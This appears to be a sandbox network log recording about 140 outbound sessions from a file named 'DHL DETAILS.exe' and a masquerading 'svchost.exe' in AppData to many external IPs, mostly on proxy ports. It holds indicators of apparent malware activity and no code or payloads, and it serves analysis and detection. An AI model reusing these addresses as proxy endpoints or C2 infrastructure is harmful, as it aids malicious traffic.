6349	192.168.2.5	49700	135.148.10.161	41146	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6350	192.168.2.5	59138	212.108.155.205	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6351	192.168.2.5	51412	92.205.110.118	3414	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6352	192.168.2.5	59110	103.148.51.19	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6353	192.168.2.5	59217	198.57.211.235	11096	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6354	192.168.2.5	51817	178.115.253.35	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6355	192.168.2.5	59292	162.159.242.158	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6356	192.168.2.5	59310	104.16.81.76	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6357	192.168.2.5	51658	41.65.224.91	1981	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6358	192.168.2.5	59207	120.77.148.138	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6359	192.168.2.5	59279	203.74.125.18	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6360	192.168.2.5	59346	201.174.239.28	4153	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6361	192.168.2.5	59361	172.67.35.15	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6362	192.168.2.5	58712	72.206.181.97	64943	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6363	192.168.2.5	52523	171.250.222.13	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6364	192.168.2.5	59298	35.199.90.225	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6365	192.168.2.5	58027	67.201.59.70	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6366	192.168.2.5	59339	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6367	192.168.2.5	59384	35.72.118.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6368	192.168.2.5	59328	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6369	192.168.2.5	58019	45.11.95.165	6039	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6370	192.168.2.5	57941	109.194.22.61	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6371	192.168.2.5	63322	103.130.218.135	32338	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6372	192.168.2.5	50732	82.165.208.126	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6373	192.168.2.5	59389	121.128.194.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6374	192.168.2.5	59419	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6375	192.168.2.5	58808	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6376	192.168.2.5	53726	192.252.208.70	14282	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6377	192.168.2.5	58810	27.65.240.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6378	192.168.2.5	58169	35.199.90.225	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6379	192.168.2.5	59426	210.4.194.196	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6380	192.168.2.5	59481	104.20.24.214	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6381	192.168.2.5	59498	172.67.253.69	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6382	192.168.2.5	59334	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6383	192.168.2.5	50738	193.138.178.6	8282	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6384	192.168.2.5	63474	107.180.90.88	64081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6385	192.168.2.5	63421	41.77.188.131	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6386	192.168.2.5	59022	45.61.188.134	44499	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6387	192.168.2.5	51211	132.148.245.247	10958	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6388	192.168.2.5	52882	162.214.225.223	34071	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6389	192.168.2.5	59504	162.214.225.223	54917	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6390	192.168.2.5	63462	51.75.126.150	36694	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6391	192.168.2.5	58809	180.250.159.49	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6392	192.168.2.5	58886	51.15.234.222	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6393	192.168.2.5	59634	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6394	192.168.2.5	59638	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6395	192.168.2.5	59643	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6396	192.168.2.5	59647	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6397	192.168.2.5	59444	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6398	192.168.2.5	59387	103.153.154.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6399	192.168.2.5	59544	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6400	192.168.2.5	53563	183.100.14.134	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6401	192.168.2.5	59447	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6402	192.168.2.5	59474	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6403	192.168.2.5	59501	211.222.252.187	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6404	192.168.2.5	59587	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6405	192.168.2.5	52939	138.36.199.14	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6406	192.168.2.5	59654	104.21.102.95	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6407	192.168.2.5	59690	104.21.6.88	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6408	192.168.2.5	59529	47.74.152.29	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6409	192.168.2.5	63523	207.180.198.241	57327	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6410	192.168.2.5	59570	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6411	192.168.2.5	59631	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6412	192.168.2.5	59644	92.204.135.37	63462	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6413	192.168.2.5	59721	198.105.100.156	6407	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6414	192.168.2.5	53701	158.69.53.98	9300	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6415	192.168.2.5	58948	170.245.132.15	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6416	192.168.2.5	59669	144.76.96.180	5566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6417	192.168.2.5	59702	106.14.255.124	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6418	192.168.2.5	59784	172.67.181.51	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6419	192.168.2.5	59789	104.16.213.202	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6420	192.168.2.5	59699	8.222.164.205	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6421	192.168.2.5	51955	51.222.241.157	46286	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6422	192.168.2.5	59676	43.128.107.251	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6423	192.168.2.5	51444	82.146.37.145	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6424	192.168.2.5	51511	148.72.209.174	38088	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6425	192.168.2.5	52079	112.78.155.210	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6426	192.168.2.5	51905	162.214.227.68	31825	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6427	192.168.2.5	58748	125.227.225.157	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6428	192.168.2.5	53803	34.81.72.31	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6429	192.168.2.5	59796	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6430	192.168.2.5	51999	51.38.63.124	10983	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6431	192.168.2.5	52250	188.132.221.163	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6432	192.168.2.5	63610	185.103.178.242	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6433	192.168.2.5	59347	193.151.130.114	8086	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6434	192.168.2.5	59639	5.32.88.130	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6435	192.168.2.5	59107	115.96.208.124	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6436	192.168.2.5	59589	119.39.68.105	2323	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6437	192.168.2.5	58807	117.160.250.138	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6438	192.168.2.5	59200	50.62.134.139	2655	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6439	192.168.2.5	59066	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6440	192.168.2.5	59352	199.102.107.145	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6441	192.168.2.5	59786	58.234.116.197	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6442	192.168.2.5	58752	142.54.228.193	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6443	192.168.2.5	53286	162.243.55.12	50941	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6444	192.168.2.5	53048	220.118.191.238	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6445	192.168.2.5	53301	37.187.77.58	52593	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6446	192.168.2.5	63729	162.214.121.173	33572	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6447	192.168.2.5	58723	68.169.60.220	8380	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6448	192.168.2.5	63694	208.87.131.240	41368	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6449	192.168.2.5	59531	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6450	192.168.2.5	53929	162.240.72.139	25591	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6451	192.168.2.5	53570	37.97.201.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6452	192.168.2.5	59611	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6453	192.168.2.5	59839	162.159.247.57	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6454	192.168.2.5	59792	121.128.194.154	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6455	192.168.2.5	59801	70.166.167.38	57728	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6456	192.168.2.5	59798	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6457	192.168.2.5	59795	8.219.228.100	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6458	192.168.2.5	59178	37.187.91.192	21981	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6459	192.168.2.5	59853	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6460	192.168.2.5	59633	185.49.31.207	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6461	192.168.2.5	59626	103.36.35.135	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6462	192.168.2.5	59819	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6463	192.168.2.5	59872	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6464	192.168.2.5	59885	129.213.150.205	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6465	192.168.2.5	54313	107.180.90.88	20309	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6466	192.168.2.5	52737	27.147.131.122	8090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6467	192.168.2.5	59866	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6468	192.168.2.5	59856	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6469	192.168.2.5	59774	119.39.68.105	2323	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6470	192.168.2.5	59905	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6471	192.168.2.5	59858	144.24.77.90	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6472	192.168.2.5	59869	211.222.252.187	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6473	192.168.2.5	59455	72.210.208.101	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6474	192.168.2.5	59871	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6475	192.168.2.5	54786	54.38.176.200	26591	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6476	192.168.2.5	63864	84.47.145.189	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6477	192.168.2.5	54433	152.67.10.190	8100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6478	192.168.2.5	59889	138.36.199.14	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6479	192.168.2.5	63854	189.39.118.210	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6480	192.168.2.5	59902	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6481	192.168.2.5	59895	47.100.236.23	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6482	192.168.2.5	59622	104.200.135.46	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6483	192.168.2.5	59295	37.187.141.160	2604	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6484	192.168.2.5	59939	172.67.182.48	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6485	192.168.2.5	54425	196.216.14.86	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6486	192.168.2.5	59908	31.28.4.192	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6487	192.168.2.5	59617	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6488	192.168.2.5	59915	47.74.152.29	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6489	192.168.2.5	52594	95.56.254.139	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6490	192.168.2.5	63999	209.126.104.38	15097	56176	C:\Users\user\AppData\Roaming\svchost.exe

